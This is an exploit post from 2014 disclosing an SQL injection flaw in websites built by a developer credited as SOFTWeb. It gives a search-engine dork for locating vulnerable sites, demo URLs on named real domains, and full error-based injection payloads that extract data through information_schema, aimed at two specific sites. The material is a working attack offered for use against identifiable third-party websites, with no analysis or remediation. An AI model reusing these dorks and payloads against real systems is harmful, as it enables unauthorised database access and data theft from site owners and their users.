facebook facebook twitter rss

Designed and developed by SOFTWeb SQL injection vulnerability

Author: Tonel Team , Published: 11-05-2014
 ###########################
# Exploit Title : Designed and developed by SOFTWeb SQL injection vulnerability
#
# Exploit Author : Tonel Team
#
# Discovered By : Baad_jens
#
# Home : www.tonel.org
#
# Dork : intext:Designed and developed by SOFTWeb inurl:ID=
#
# Date: 2014 may 9
#
# Tested on:windows 7
#
# Software Link: http://www.softweb.gr
#
# Contact To Me: ghaatzade@yahoo.com
#
#
###########################


# DemO1_ http://www.bianchi.gr/bike.php?id=171%27
# DemO2_http://www.clermont.gr/en/bike.php?id=18%27
# DemO3_http://www.esoftng.net/technologies.php?id=8%27
#
#
##########################
# 1_ http://www.clermont.gr : Injection Syntax: 18\' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and \'1\'=\'1
#
# 2_http://www.bianchi.gr :Injection Syntax: 171\' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit
# 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and \'1\'=\'1
#
#
#
###################################
#
# Special Tnx To : MR.Alone & MR.HOSSEIN & Amir Derafsh
#
#
###########################

Like us on Facebook :